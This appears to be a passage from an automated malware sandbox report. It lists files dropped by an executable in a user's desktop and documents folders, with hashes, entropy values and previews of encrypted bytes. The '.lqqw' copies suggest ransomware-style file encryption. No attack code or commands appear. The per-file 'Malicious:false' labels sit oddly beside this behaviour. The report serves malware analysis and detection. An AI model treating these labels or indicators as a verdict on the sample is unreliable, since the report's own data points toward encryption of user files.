                                                                                                                                                                                                    SHA-512:C762BC0BA1CA1FCD66F652455E9096AF78A23CD2FFD8FFC0982A6F8D0A980AAF6F934999648BE5AF96E711CF972EA14AA46DD383B444A4EE776A933132C7C0BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: D%...."....U..$"..Ta3.A.6Y.qt.Z........[5..G!...<...&.'..J.....T.1.._..........\..b+.I.....;........P...k.S6LYw.b..A..:...Q.....'....P.XG.R n1.)...y...L+%F......8.}.Ck...N,......5S..z.2.....cTx...w.]..).)....t..8.A....m.F.....`D.0..45..4...{0 . .....:7u..p.....C....e.. ..'6|..S..Z..[.2B6/...#&@.r.....p..O"....#..+D.2...2En....^.jj..J...U._..../U.m...V.U..;...8....`Lh....'>..C.h......K.L..J.f.....w.;...tQ#....Es..N..IQ....}..IJk.e(5{....h@r...Vp...b......./....P..!Cc........o.v........((..9.y...;.&...S.K..`....Li..O....-..a*....}3.g...d../H..7.....x..V..S.UGd..+=.Y..qK.cU.2..F~...0#.R.B],..K....y.3.|-.v.,.:)...i2.ZV..N....J.Y..9.7*k.h..F/v!G`D+....e..\......{H.'lO...@$6g...d..C&.C.+...r...-....?.......,T".N.m.w%.Q#...7-.r..L}.9..e......:......_../3m.L.u..t....f..P.;.C.....k.rR.".~.+.OfZ.G.....xni\.Q..`...O...N......A./iH.....L......e..([....d..h._4N........%$[/. C.<f.T...|.5.g.o.)a<.e..l.E...3A~.......-@%.<....tv..AX.....b..c1p...g....8.
                                                                                                                                                                                                    C:\Users\user\Desktop\QCOILOQIKC.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.846903909538003
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:JYc5GaEBIVm7Uc/UGDZEyyXyHJLGwbvFD/eAUVwEjDUFqwV0NL2e5itubD:JYc5GLIVVQDtM4LGevFD/0T5fOMD
                                                                                                                                                                                                    MD5:15B03CD36912E93EB97911CB2BB96973
                                                                                                                                                                                                    SHA1:8B104EC5ED820C4375C350CFC9D95DF6EBECBB93
                                                                                                                                                                                                    SHA-256:B65E4B09D63F922196E6649EA8D36372887B823EB759C43D35F7C67411B38225
                                                                                                                                                                                                    SHA-512:C762BC0BA1CA1FCD66F652455E9096AF78A23CD2FFD8FFC0982A6F8D0A980AAF6F934999648BE5AF96E711CF972EA14AA46DD383B444A4EE776A933132C7C0BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: D%...."....U..$"..Ta3.A.6Y.qt.Z........[5..G!...<...&.'..J.....T.1.._..........\..b+.I.....;........P...k.S6LYw.b..A..:...Q.....'....P.XG.R n1.)...y...L+%F......8.}.Ck...N,......5S..z.2.....cTx...w.]..).)....t..8.A....m.F.....`D.0..45..4...{0 . .....:7u..p.....C....e.. ..'6|..S..Z..[.2B6/...#&@.r.....p..O"....#..+D.2...2En....^.jj..J...U._..../U.m...V.U..;...8....`Lh....'>..C.h......K.L..J.f.....w.;...tQ#....Es..N..IQ....}..IJk.e(5{....h@r...Vp...b......./....P..!Cc........o.v........((..9.y...;.&...S.K..`....Li..O....-..a*....}3.g...d../H..7.....x..V..S.UGd..+=.Y..qK.cU.2..F~...0#.R.B],..K....y.3.|-.v.,.:)...i2.ZV..N....J.Y..9.7*k.h..F/v!G`D+....e..\......{H.'lO...@$6g...d..C&.C.+...r...-....?.......,T".N.m.w%.Q#...7-.r..L}.9..e......:......_../3m.L.u..t....f..P.;.C.....k.rR.".~.+.OfZ.G.....xni\.Q..`...O...N......A./iH.....L......e..([....d..h._4N........%$[/. C.<f.T...|.5.g.o.)a<.e..l.E...3A~.......-@%.<....tv..AX.....b..c1p...g....8.
                                                                                                                                                                                                    C:\Users\user\Desktop\TQDFJHPUIU.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8398777563098445
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:dQ2MJgV+W8QpCG6By9BXRum5VXvyztfJsh5fEKRcB2nlv9V6IY5bD:dQB+9b3RumGxifEmXlv9V6IY5D
                                                                                                                                                                                                    MD5:2BE83C67835126FA87F60BC24B82DAF9
                                                                                                                                                                                                    SHA1:92C0C42F31D9EE010DDAAC34A078D32FB88FED92
                                                                                                                                                                                                    SHA-256:26B28D36DC03C0F2531243A1EDCDA8316C31708AB7EB14E724DF18A06B04DBD6
                                                                                                                                                                                                    SHA-512:4E4CDA5DF3D653BC482388F52D4BC0E3D88E7A091A357A1DFFE20C799E34627660AF2155A4E206BBA367CF698334CC85123232B40EFB95EF421B8007F16F683F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...u...4......w>.....]...!.%V....k.j......!.Gz.#...8.V..Y.....a.....hI0i-]Jjr.q..wQ.9.O.s.....{T...[.S}...h.....P.2.#....p.#{..Dp4...Ht)..(..5Fz..K...Si.e.Y....dR$B..............$..q....h.......~..qMM^.=?Xx.C.7......(.....aC,....C......#.;v.#.Pc.H...)P...3......m.:.:.k Q......^.....D.r.9.?.....Eh.c*L=X."...-.N.y]....r.K....C...5..[E...-[*.|.fJ=.2.....G...?..O.*Bf(..I..2..D..T>\...X..G........+.n...6.JP.l.l...g.....z.y.(..iQ....8....T..2g.........1...f._.bvy.3...Q.."...m.Tl..\gS..M.Gz........q.R.........q..3.....;..:..x.Y..F..4...;f..z[.4..~....aT...Zv...n.q...?...!...$BA.{..Y..e..f.2..m..V..,.G..Ds.)U7......j..J.....@....16.%\(U....F.W...]...*...4......).C.....^...(n...bU[..F]+%AB......m.B&.E.....u..!F7R....+.$Ku......81%v...7t@.k......Y......o.&5.U.j..B..G...0..[./A:..U...u.......TW.$....:.a.-O..rv|)..d....N.oe.%....D...h.TEEW.?R....."Pg...... ..2.T.q..?Q..9..N0if.D*.}.).'.^....[....r..`...."...z.p.......$..d.WJ....$$...$....2..`=..45...M.
                                                                                                                                                                                                    C:\Users\user\Desktop\TQDFJHPUIU.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8398777563098445
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:dQ2MJgV+W8QpCG6By9BXRum5VXvyztfJsh5fEKRcB2nlv9V6IY5bD:dQB+9b3RumGxifEmXlv9V6IY5D
                                                                                                                                                                                                    MD5:2BE83C67835126FA87F60BC24B82DAF9
                                                                                                                                                                                                    SHA1:92C0C42F31D9EE010DDAAC34A078D32FB88FED92
                                                                                                                                                                                                    SHA-256:26B28D36DC03C0F2531243A1EDCDA8316C31708AB7EB14E724DF18A06B04DBD6
                                                                                                                                                                                                    SHA-512:4E4CDA5DF3D653BC482388F52D4BC0E3D88E7A091A357A1DFFE20C799E34627660AF2155A4E206BBA367CF698334CC85123232B40EFB95EF421B8007F16F683F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...u...4......w>.....]...!.%V....k.j......!.Gz.#...8.V..Y.....a.....hI0i-]Jjr.q..wQ.9.O.s.....{T...[.S}...h.....P.2.#....p.#{..Dp4...Ht)..(..5Fz..K...Si.e.Y....dR$B..............$..q....h.......~..qMM^.=?Xx.C.7......(.....aC,....C......#.;v.#.Pc.H...)P...3......m.:.:.k Q......^.....D.r.9.?.....Eh.c*L=X."...-.N.y]....r.K....C...5..[E...-[*.|.fJ=.2.....G...?..O.*Bf(..I..2..D..T>\...X..G........+.n...6.JP.l.l...g.....z.y.(..iQ....8....T..2g.........1...f._.bvy.3...Q.."...m.Tl..\gS..M.Gz........q.R.........q..3.....;..:..x.Y..F..4...;f..z[.4..~....aT...Zv...n.q...?...!...$BA.{..Y..e..f.2..m..V..,.G..Ds.)U7......j..J.....@....16.%\(U....F.W...]...*...4......).C.....^...(n...bU[..F]+%AB......m.B&.E.....u..!F7R....+.$Ku......81%v...7t@.k......Y......o.&5.U.j..B..G...0..[./A:..U...u.......TW.$....:.a.-O..rv|)..d....N.oe.%....D...h.TEEW.?R....."Pg...... ..2.T.q..?Q..9..N0if.D*.}.).'.^....[....r..`...."...z.p.......$..d.WJ....$$...$....2..`=..45...M.
                                                                                                                                                                                                    C:\Users\user\Desktop\UNKRLCVOHV.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.832342294478588
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:jPI1ATo1oeubViGKLT9vRb4p1+gA2WE+EGslZNkYZC4tzUbD:iyooeuhiT9vmp1iE+EGsXXC4tz+D
                                                                                                                                                                                                    MD5:C215CB3F4121892941009BD30A93E3DF
                                                                                                                                                                                                    SHA1:BE580F9F858A92E086BD669F0679375044B5191F
                                                                                                                                                                                                    SHA-256:C5C633D347A12F17E1D462C61C0D94E75A55D93D914808B353B243FD8E2B5471
                                                                                                                                                                                                    SHA-512:B93CC220462CFF49634CB9CFD6DCC93912F6F89B03419F2D718E590BD1EB880551BCF7D81B0FA3623AEEA4026E008C7276DBB3B3635154334D0AC3EB27F6FC00
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .9.HH.....0.R6..T.....m.pk..c...5{_.....W.\".]..-.S`5.l.v....A....==.*G9..o.....r?.......V*....ff..v?.H..4..$^}.... r.l....v.Kv..6..q!...&.S.e.......18K......J.....GId.R?...t..a+w_.....bm...6../.F..7....,.rU'.....QyxW.~..dzV..?..6."...D..T...r.....<.p.NU.]>[$/..,..n...#...,.J../...H.).hi...o....3.T...J....i..t8.1.6&t.T}..fDE........,.R......X..3....\.S...`....Q.g...<....0....,...w./....Ep:...O...4ge.9 ....&...B.s...y.P.<.{T.....?+..V..0.x+.]{..'.*.Xlv..T.J2n..P.Fap.....wz..R.......wA..EG..m}..kRm.B.8..vhu..A...7.}T..-..e.QrRS.eF.................xo.....j.....d/@...1.I....I.W..."..>Q.q...4....B.+b...J_.&4....|...m....MY....$.S/..l....2....V.~.B.4.^..(.K.I../.P...\.)*.@.9..Sn.z..n..5....i..p&..=..Re.'&.laU.7P..2..}T..24..N.[.ros..&.%.'.g,#..r....k..t...X...... ......t.._< ...LA|e....G..."..1....\.x..S.0Q._./z..b..{.7+../.,............h.+....3<........`..2...w.h. ...I...P...C._... .x.p..C&'({..1..@...+.s.a.Z..Ii.O..-.M........uk.W.........x.9
                                                                                                                                                                                                    C:\Users\user\Desktop\UNKRLCVOHV.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.832342294478588
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:jPI1ATo1oeubViGKLT9vRb4p1+gA2WE+EGslZNkYZC4tzUbD:iyooeuhiT9vmp1iE+EGsXXC4tz+D
                                                                                                                                                                                                    MD5:C215CB3F4121892941009BD30A93E3DF
                                                                                                                                                                                                    SHA1:BE580F9F858A92E086BD669F0679375044B5191F
                                                                                                                                                                                                    SHA-256:C5C633D347A12F17E1D462C61C0D94E75A55D93D914808B353B243FD8E2B5471
                                                                                                                                                                                                    SHA-512:B93CC220462CFF49634CB9CFD6DCC93912F6F89B03419F2D718E590BD1EB880551BCF7D81B0FA3623AEEA4026E008C7276DBB3B3635154334D0AC3EB27F6FC00
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .9.HH.....0.R6..T.....m.pk..c...5{_.....W.\".]..-.S`5.l.v....A....==.*G9..o.....r?.......V*....ff..v?.H..4..$^}.... r.l....v.Kv..6..q!...&.S.e.......18K......J.....GId.R?...t..a+w_.....bm...6../.F..7....,.rU'.....QyxW.~..dzV..?..6."...D..T...r.....<.p.NU.]>[$/..,..n...#...,.J../...H.).hi...o....3.T...J....i..t8.1.6&t.T}..fDE........,.R......X..3....\.S...`....Q.g...<....0....,...w./....Ep:...O...4ge.9 ....&...B.s...y.P.<.{T.....?+..V..0.x+.]{..'.*.Xlv..T.J2n..P.Fap.....wz..R.......wA..EG..m}..kRm.B.8..vhu..A...7.}T..-..e.QrRS.eF.................xo.....j.....d/@...1.I....I.W..."..>Q.q...4....B.+b...J_.&4....|...m....MY....$.S/..l....2....V.~.B.4.^..(.K.I../.P...\.)*.@.9..Sn.z..n..5....i..p&..=..Re.'&.laU.7P..2..}T..24..N.[.ros..&.%.'.g,#..r....k..t...X...... ......t.._< ...LA|e....G..."..1....\.x..S.0Q._./z..b..{.7+../.,............h.+....3<........`..2...w.h. ...I...P...C._... .x.p..C&'({..1..@...+.s.a.Z..Ii.O..-.M........uk.W.........x.9
                                                                                                                                                                                                    C:\Users\user\Desktop\ZGGKNSUKOP.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.835379676098609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:tBLVkOAre2857AqBBJyWErH0ue1eY0DLUZ3ajt6kRtX/htlg3jbD:fsp85rMjVbL4OskTBgnD
                                                                                                                                                                                                    MD5:F4007877BD4DB4695D106E011D7820DD
                                                                                                                                                                                                    SHA1:8A213A6D892CEE792711692CCBA75E1044AE6B10
                                                                                                                                                                                                    SHA-256:72BF3D51F93F169EFAE682F8076F9E72D06319B5402CA861986E32AD4B7CBC50
                                                                                                                                                                                                    SHA-512:7A3B87D846BD0293A49C36B10DEEF6D5C7500BBE5C477A81D3AC13CBB69C5ABF9107BDDA4C93507E32733FA06FA63DFC95166DFC186CB372991250EF44C6E58B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..0.z)."...8..._...3wSg4.....t}oR[..,....C........s.)h.u.HP....%..L...\r>..&G....`.....T.P....{..$1.W(..l.3.......B{.VfP...lJ....&%I.^....._......7..p@T...5Q_G/........p..C..X.....m.;...E.j>....%g....j.....Z.Q.*..t...N...p.c.c.z.r....h........_....G...L.7.#.c...$......~.*.%.([~.,_#<.,~.[A.g[..J-+.....-.xT.~w.e .-....~...'.I.`..9Xh...m.9h..epkG..o....Q}ox..E..R... ...[.j]$lb..Y..Ds.....O......@w....s...+.m.....H.o...N.R..X..O...S..k1....u.u...e..+F...-8."...rK[.yyS..|.a0....*..O..>.*b...`ox9.B....*......#m.6.7".....r_.~.~[.*.k...bO{..........,H+...F.".?.L"...?..V8...*f<!.........f.....+&.p......a.|.X......lF{.#9.{.|.V_f......ar.Yj...Z..........e.. .d...#..'vG.}.%..z}e.......jc.....;K...{n.P.8.M.Xi.l.Q"..5.Z.%B>.+\......*....o.!1.....F.yg)....c.x`..g..]..hQ%.I.e..].....<...g@%..:.{.F.-.D."x.H.4P.0..z.,X..iJP.."l.mr 3.Q.w.e...K..J!.$..;.C..;.c..T.-in!....I..P...T=.AB)|...."......Nz....X..#.Q^ .N.P..'.B..C.r@.*}.h./#.....Z.GzuT}.E.OT.
                                                                                                                                                                                                    C:\Users\user\Desktop\ZGGKNSUKOP.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.835379676098609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:tBLVkOAre2857AqBBJyWErH0ue1eY0DLUZ3ajt6kRtX/htlg3jbD:fsp85rMjVbL4OskTBgnD
                                                                                                                                                                                                    MD5:F4007877BD4DB4695D106E011D7820DD
                                                                                                                                                                                                    SHA1:8A213A6D892CEE792711692CCBA75E1044AE6B10
                                                                                                                                                                                                    SHA-256:72BF3D51F93F169EFAE682F8076F9E72D06319B5402CA861986E32AD4B7CBC50
                                                                                                                                                                                                    SHA-512:7A3B87D846BD0293A49C36B10DEEF6D5C7500BBE5C477A81D3AC13CBB69C5ABF9107BDDA4C93507E32733FA06FA63DFC95166DFC186CB372991250EF44C6E58B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..0.z)."...8..._...3wSg4.....t}oR[..,....C........s.)h.u.HP....%..L...\r>..&G....`.....T.P....{..$1.W(..l.3.......B{.VfP...lJ....&%I.^....._......7..p@T...5Q_G/........p..C..X.....m.;...E.j>....%g....j.....Z.Q.*..t...N...p.c.c.z.r....h........_....G...L.7.#.c...$......~.*.%.([~.,_#<.,~.[A.g[..J-+.....-.xT.~w.e .-....~...'.I.`..9Xh...m.9h..epkG..o....Q}ox..E..R... ...[.j]$lb..Y..Ds.....O......@w....s...+.m.....H.o...N.R..X..O...S..k1....u.u...e..+F...-8."...rK[.yyS..|.a0....*..O..>.*b...`ox9.B....*......#m.6.7".....r_.~.~[.*.k...bO{..........,H+...F.".?.L"...?..V8...*f<!.........f.....+&.p......a.|.X......lF{.#9.{.|.V_f......ar.Yj...Z..........e.. .d...#..'vG.}.%..z}e.......jc.....;K...{n.P.8.M.Xi.l.Q"..5.Z.%B>.+\......*....o.!1.....F.yg)....c.x`..g..]..hQ%.I.e..].....<...g@%..:.{.F.-.D."x.H.4P.0..z.,X..iJP.."l.mr 3.Q.w.e...K..J!.$..;.C..;.c..T.-in!....I..P...T=.AB)|...."......Nz....X..#.Q^ .N.P..'.B..C.r@.*}.h./#.....Z.GzuT}.E.OT.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842425175877504
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:AvGsh/ijqhRQr0pBTEmo6nrz3EJSB/trOUiJ4aMQkUMe9K/m52WjXP5hBVubD:OFFQrKBgDyLQSB/tuJ5kUlIO52qPHBVo
                                                                                                                                                                                                    MD5:2F553F372296A68B746618A40459C3B8
                                                                                                                                                                                                    SHA1:42D9714B30675449D1B80A46014C9BA25DC37370
                                                                                                                                                                                                    SHA-256:F1DBE7DB9EF6DC86AF7CCA2541DCA35BE5322E108D56FE6DF5EB4B2020F826AC
                                                                                                                                                                                                    SHA-512:CFCE94B84AD0031A9A4DF9884D5D95DA486000D17EB071BBB36855EB4DBA7D022020D360F3C9F1E46535AE9C5D9B57CD0F5CE3EA38693CD9B81C82F03BA36627
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /.ix.Ig..).L.bQ...3svx.....hQ..,.80.0YU.....v....P.ELwy....p.z.4V.j...!...>......t.....d..-....vXP.mI[B[(.<,......}..Zs.^.YR....v 1...k.....u..p.C..2p..H.n:..'..<.....@&.......l,../.........q..%.p.oW.....W@.c...h..=.rS..]....I.]...[.....P......j..h......m..P.6.:m.2.w....a.sqi..4.K.C.RUP.*...(..ML......s.....\.u...v..^}...>..&.d....S.o.s..K... 1.o...|...c.R....B"l..-`....Q....:a.3.+....G#7>=......'4....z.~.m...%3;.}$..q...C.R..YH........X.<.....7h!&..'...n.L2......{9.OGuA./G..!.GB.~....).NNL.'......k.............$..`...b...5..j.g.(M.f..a.t.b.....2.S..7...,F..z..G..yWL..wEv62q.t2@J>..Y.~k.-s.........P".......Js.K....3.bQSs..9...\.w..7.......80T.-.*.?...{...}_X...W~.F.mw.V...V..q.g}........#....).U.].\/.}.M..:a.zn..g....vt..8\j.IOB.....4r....bnJ.a}..aqE.r.../.F.J..9n..6%#i..D.......k.(...*.0.|...T^-..6.....P.Z.8..g31...@.N..(b.j.`....C...N..gO9..A...gq.VYP.P.[..'..\, 'h>..c.u..?..:)q....L..Z....X......r..%.....@.o.5....[Y..Wv@r.......7
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842425175877504
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:AvGsh/ijqhRQr0pBTEmo6nrz3EJSB/trOUiJ4aMQkUMe9K/m52WjXP5hBVubD:OFFQrKBgDyLQSB/tuJ5kUlIO52qPHBVo
                                                                                                                                                                                                    MD5:2F553F372296A68B746618A40459C3B8
                                                                                                                                                                                                    SHA1:42D9714B30675449D1B80A46014C9BA25DC37370
                                                                                                                                                                                                    SHA-256:F1DBE7DB9EF6DC86AF7CCA2541DCA35BE5322E108D56FE6DF5EB4B2020F826AC
                                                                                                                                                                                                    SHA-512:CFCE94B84AD0031A9A4DF9884D5D95DA486000D17EB071BBB36855EB4DBA7D022020D360F3C9F1E46535AE9C5D9B57CD0F5CE3EA38693CD9B81C82F03BA36627
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /.ix.Ig..).L.bQ...3svx.....hQ..,.80.0YU.....v....P.ELwy....p.z.4V.j...!...>......t.....d..-....vXP.mI[B[(.<,......}..Zs.^.YR....v 1...k.....u..p.C..2p..H.n:..'..<.....@&.......l,../.........q..%.p.oW.....W@.c...h..=.rS..]....I.]...[.....P......j..h......m..P.6.:m.2.w....a.sqi..4.K.C.RUP.*...(..ML......s.....\.u...v..^}...>..&.d....S.o.s..K... 1.o...|...c.R....B"l..-`....Q....:a.3.+....G#7>=......'4....z.~.m...%3;.}$..q...C.R..YH........X.<.....7h!&..'...n.L2......{9.OGuA./G..!.GB.~....).NNL.'......k.............$..`...b...5..j.g.(M.f..a.t.b.....2.S..7...,F..z..G..yWL..wEv62q.t2@J>..Y.~k.-s.........P".......Js.K....3.bQSs..9...\.w..7.......80T.-.*.?...{...}_X...W~.F.mw.V...V..q.g}........#....).U.].\/.}.M..:a.zn..g....vt..8\j.IOB.....4r....bnJ.a}..aqE.r.../.F.J..9n..6%#i..D.......k.(...*.0.|...T^-..6.....P.Z.8..g31...@.N..(b.j.`....C...N..gO9..A...gq.VYP.P.[..'..\, 'h>..c.u..?..:)q....L..Z....X......r..%.....@.o.5....[Y..Wv@r.......7
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.825470153626653
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ET1yE9Z0hbZGh3p0KiKfteknMCp6N45wp+Oj6ficfTVD4EhqP8A16Df0NdEErpxS:EHZ0jy3p0KLeOMqMYwpdyxD46qn16T0Q
                                                                                                                                                                                                    MD5:8D32115833AA98BD866E4DF2FB12DDE3
                                                                                                                                                                                                    SHA1:276DB90AC42096D19B7741AE54C0DA580C5E046E
                                                                                                                                                                                                    SHA-256:3EF97302E1D0C5EDA33B446D7AA97EBA01C5DF5FF4F8B80156CBDD282035C3EE
                                                                                                                                                                                                    SHA-512:53B7241BD466958CC9155FC2F4F0F60C810E9B539DCBF80B625E1AB8F834C70BE35E13737F6F2C7033C383E01FE324C32AA44E0A1002FAA2B49C8BC2E10FF1DA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...m.c..1E_..z....q4M...6...>Q!.W.......i..O.7d..S...Iyr..%....B.8\.D.b{RJ?.L.#./..1.... ..)1....K.........O.`.....`....Pg.-+.........G..f.8.....z....'..W...1.....P...#.XS.(~.U..h..u6<.p.[8.@...GK..}...-mA]{.*.x.P.3$...y):.h.......E=.....t..4?...*6...o.....[.|OZ..:..kzm().....e5..7..NX.3...)......+.`H..d.|....r=....c..J.r.^.[..b.E..<,H.N.Cfcp.&...-..)$\.^6Jy.F..p...VT(K/.8^..u.S.6.....Z..7.jrY....y. Fw>..!J.)..x|..#...B....-.1._...-..^..r.a...s.....[x@.d..BQ.[Ek...[.."C.dc.O...s.^W^.yW%..L..H..I-.`*.2X0. &..['.....@...dk'd....uW...*R.>.;...d.2.um'...t+.o....V.QaF..?o..O..b=..O....*..9RK...2.O.....bi.F.I...:....:cfh..! =.l...u^./....... ....\..^..n.dB,...UB..O.?S....\..$Af..5..TWsz..HT.....p...X^....wd.......w.......@xJL2..~p..+......:..f....z...++[..c.)........r?...!_.=.Q?...Y@......EP......H..Z..0.c..Z.O8...GADd"rh2|.mLez(.k4x....-..c.. ...S..h6@.7...kJ......r...dn.....,......./4.\3..w....GA+AG.C.."...w4./.'.;...-uP.....~.S.......
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.825470153626653
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ET1yE9Z0hbZGh3p0KiKfteknMCp6N45wp+Oj6ficfTVD4EhqP8A16Df0NdEErpxS:EHZ0jy3p0KLeOMqMYwpdyxD46qn16T0Q
                                                                                                                                                                                                    MD5:8D32115833AA98BD866E4DF2FB12DDE3
                                                                                                                                                                                                    SHA1:276DB90AC42096D19B7741AE54C0DA580C5E046E
                                                                                                                                                                                                    SHA-256:3EF97302E1D0C5EDA33B446D7AA97EBA01C5DF5FF4F8B80156CBDD282035C3EE
                                                                                                                                                                                                    SHA-512:53B7241BD466958CC9155FC2F4F0F60C810E9B539DCBF80B625E1AB8F834C70BE35E13737F6F2C7033C383E01FE324C32AA44E0A1002FAA2B49C8BC2E10FF1DA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...m.c..1E_..z....q4M...6...>Q!.W.......i..O.7d..S...Iyr..%....B.8\.D.b{RJ?.L.#./..1.... ..)1....K.........O.`.....`....Pg.-+.........G..f.8.....z....'..W...1.....P...#.XS.(~.U..h..u6<.p.[8.@...GK..}...-mA]{.*.x.P.3$...y):.h.......E=.....t..4?...*6...o.....[.|OZ..:..kzm().....e5..7..NX.3...)......+.`H..d.|....r=....c..J.r.^.[..b.E..<,H.N.Cfcp.&...-..)$\.^6Jy.F..p...VT(K/.8^..u.S.6.....Z..7.jrY....y. Fw>..!J.)..x|..#...B....-.1._...-..^..r.a...s.....[x@.d..BQ.[Ek...[.."C.dc.O...s.^W^.yW%..L..H..I-.`*.2X0. &..['.....@...dk'd....uW...*R.>.;...d.2.um'...t+.o....V.QaF..?o..O..b=..O....*..9RK...2.O.....bi.F.I...:....:cfh..! =.l...u^./....... ....\..^..n.dB,...UB..O.?S....\..$Af..5..TWsz..HT.....p...X^....wd.......w.......@xJL2..~p..+......:..f....z...++[..c.)........r?...!_.=.Q?...Y@......EP......H..Z..0.c..Z.O8...GADd"rh2|.mLez(.k4x....-..c.. ...S..h6@.7...kJ......r...dn.....,......./4.\3..w....GA+AG.C.."...w4./.'.;...-uP.....~.S.......
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\DUUDTUBZFW.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8397512056805025
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:zCzcHdvQ3OC68EhoKi/1GYQpCySBrDMCXtUtW0JIItH7dyqIoQmTMAZNw/iFdRQW:SaI3J6bzi/1D4CFB0CXtCELoQmTbZ287
                                                                                                                                                                                                    MD5:2A553AE409A3352FA2F8FDD1AB2C0544
                                                                                                                                                                                                    SHA1:E58F412C050E54F97C5C2AAC5F54D2C62A72C170
                                                                                                                                                                                                    SHA-256:368F9BDAA053AB27E6FCF7CEFECA4ED9006F1F26482A1ACAC5AD3B1D6B3F0D8D
